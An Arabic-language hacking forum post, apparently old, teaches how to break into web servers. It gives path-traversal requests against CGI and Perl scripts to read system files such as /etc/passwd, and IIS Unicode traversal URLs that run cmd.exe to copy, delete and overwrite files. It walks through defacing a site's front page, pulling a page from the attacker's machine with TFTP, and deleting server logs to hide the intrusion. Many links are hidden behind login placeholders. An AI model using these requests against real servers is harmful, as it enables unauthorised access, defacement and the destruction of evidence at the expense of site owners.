-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- استغلال العيب في ملفات Cgi & Perl للوصول الى etc/passwd اولا: سناخذ الثغرات من نوع Show Files اولا عند وجود هذا الملف /cgi-bin/apexec.pl? الباسوورد علينا استغلال هذه الثغرة للوصول الى [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ../../../../../etc/resolv.conf%00.html&passurl=/category/ مع امكانية تغيير path بالملف المراد هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي /cgi-bin/hsx.cgi? عند وجود هذا الملف في /cgi-bin/ طبق الثغرة التالية [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات مثل /cgi-bin/hsx.cgi? وعند وجوده يتم تطبيق ثغرته. ------------------------------------------------------------------- 4 - شرح ثغرة اي اي اس وكيفية استغلالها: IIS = Inetnet Information Service و نستخدم ثغراته المعروفه باليونيكودز Unicodes و هي كثيره جدا و انا اعني ما اقول مثل : ********************************************** [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: ************************************************* طريقه استغلال ثغرات اي اي اس بكذى طريقه يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال cmd.exe لتنفيذ اوامرنا مثال للثغره و تطبيق الاوامر: /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+chttp://www.xxxx.com/_vti_bin ----------------------------------------------------------------------------------- امر انشاء دليل جديد /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJhttp://www.xxxx.com/_vti_bin ----------------------------------------------------------------------------------- امر الغاء دليل /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJhttp://www.xxxx.com/_vti_bin ----------------------------------------------------------------------------------- الامر المستخدم للنسخ /..%c0%af../..%c0%[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe ----------------------------------------------------------------------------------- الامر المستخدم للحذف /..%c0%af../..%c0%[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp ----------------------------------------------------------------------------------- الامر المستخدم لتغيير مسمى الملف /..%c0%af../..%c0%[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm ----------------------------------------------------------------------------------- لامر المستخدم لرؤية محتويات الملف /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htmhttp://www.xxxx.com/_vti_bin ----------------------------------------------------------------------------------- الامر المستخدم للكتابة داخل أي ملف /..%c0%af../..%c0%[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt ----------------------------------------------------------------------------------- ملحوظه : -------- قد نحتاج الى تغيير مسمى الدليل بحيث يكون msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin و الان لتغيير الصفحه الاولى لموقع لابد من : الكتابه على الصفحه الرئيسيه مستخدمين الامر echo برفع صفحتك الشخصيه بواسطة برنامج ال TFTP طريقة الكتابه على الملف الرئيسي للموقع index.htm باستخدام الامر echo ------------------------ مبدئيا لابد من نسخ ملف cmd.exe الي مجلد scripts بهذا الشكل على سبيل المثال : /..%c0%af../..%c0%[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe ----------------------------------------------------------------------------------- و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] و بعدها يمكن تنفيذ الامر echo بالشكل التالي [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ----------------------------------------------------------------------------------- ملحوظات هامه: -------------- ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها index.htm فممكن ان تكون index.html , default.html , default.htm , default.asp فعليك التاكد اولا من اسم الملف و لكن index.htm هو الافتراضي ان يكون الرئيسي - ممكن ان يكون الملف الرئيسي في مجلد غير ال wwwroot لذا فلابد من البحث ... ----------------------------------------------------------------------------------- طريقة استخدام رفع الصفحه بواسطة برنامج TFTP سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى حمل برنامج ال tftp فهو صغير و مجاني ضعه في ال c: ضع الاندكس او صفحتك المراد رفعها في ايضا ال c: شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي: /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-http://www.xxxx.com/_vti_bin i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex.htm ----------------------------------------------------------------------------------- حيث ------- tftp.exe هو البرنامج المستخدم للرفع "i-" براميتر y.y.y.y رقم الايبي الخاص بك و الباقي على ما اظن لا يحتاج توضيح .. C:inetpubwwwrootindex.htm هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا ----------------------------------------------------------------------------------- و اخيرا لمسح اللوق [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log ----------------------------------------------------------------------------------- هذا تقريبا كل ما يخص سيرفرات الويندوز و ال IIS اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال ftp server فمعظم نسخ ال ftp لها ثغرات يمكن استغلالها. --------------------------------------------------------------------- 5 - شرح ثغرة اليونيكود وكيفية استغلالها: اولا ثغرات اليونيكود: UNICODE - Internet Information Service IIS4 - IIS5 اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس - تعريف باليونيكود . اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - كيفية ايجاد هذه الثغرات . يتم ايجاد هذه الثغرات بطريقتين :- 1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس . 2- بواسطة تطبيق الثغرة على الموقع مباشرة . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - كيف يتم استغلال ثغرات اليونكود . عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMD بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- الاوامر المستخدمة بواسطة ملف .CMD الاوامر المستخدمه بواسطة ملف الـ CMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حس ************************************************** ********** امر انشاء دليل جديد [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** امر الغاء دليل [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات. ************************************************** ********** الامر المستخدم للنسخ [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** الامر المستخدم للنقل [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** الامر المستخدم للحذف [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** الامر المستخدم لتغيير مسمى الملفات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** الامر المستخدم لرؤية محتويات الملف [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** الامر المستخدم للكتابة داخل أي ملف [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ************************************************** ********** الامر المستخدم لعملية سحب أي ملف عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -طريقة تطبيق هذه الثغرات . تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :- [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :- Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO . في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :- [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة: [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :- [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- طيقة نسخ ملف ال CMD نسخه الى مجلد السيكربت بهذه الطريقة :- [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] الان بامكاننا استخدام ملف الـ CMD الجديد في الثغرة بدلا من الاول بهذا الشكل [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها . تتم معرفة مشكلة الـ Access Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :- 1-لطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] |
 |
| | | | |
|
| مواقع النشر (المفضلة) |
| أدوات الموضوع | |
| أنماط العرض | |
|
|
 إعلانات نصية : | ||||||
 |  |  |  |
النمط الخطي
